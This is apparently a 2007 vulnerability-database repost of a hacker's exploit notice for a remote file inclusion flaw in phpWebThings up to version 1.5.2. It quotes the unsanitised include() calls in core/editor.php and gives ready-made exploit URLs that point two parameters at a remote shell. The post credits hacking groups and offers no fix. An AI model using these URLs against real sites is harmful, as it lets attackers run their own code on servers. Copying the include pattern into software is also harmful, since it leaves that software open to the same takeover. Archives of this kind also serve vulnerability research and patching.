Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17223
HistoryJun 11, 2007 - 12:00 a.m.

phpWebThings ==>1.5.2 RFI

2007-06-1100:00:00
vulners.com
17

*script:phpWebThings ==>1.5.2 RFI
*
*dir url:http://sourceforge.net/project/showfiles.php?group_id=19103
*
*author:titanichacker
*
*c0ntact:[email protected]
*
*H.P: hack-teach.com & mohandko.com & tryag.com
*
*bug in:
*
*(/core/editor.php)
*include($editor_insert_top);
*include($editor_insert_bottom);
*
*exploit:
*
*http://victim/path/core/editor.php?editor_insert_top=[shell]
*http://victim/path/core/editor.php?editor_insert_bottom=[shell]
*
*
*thanx
cold-zero & mohandko & drbaka & arb-hawk & kof2002 & tryag & xp10 & egy-ghost & milw0rm


With Windows Live Hotmail, you can personalize your inbox with your favorite color.
www.windowslive-hotmail.com/learnmore/personalize.html?locale=en-us&ocid=TXT_TAGLM_HMWL_reten_addcolor_0607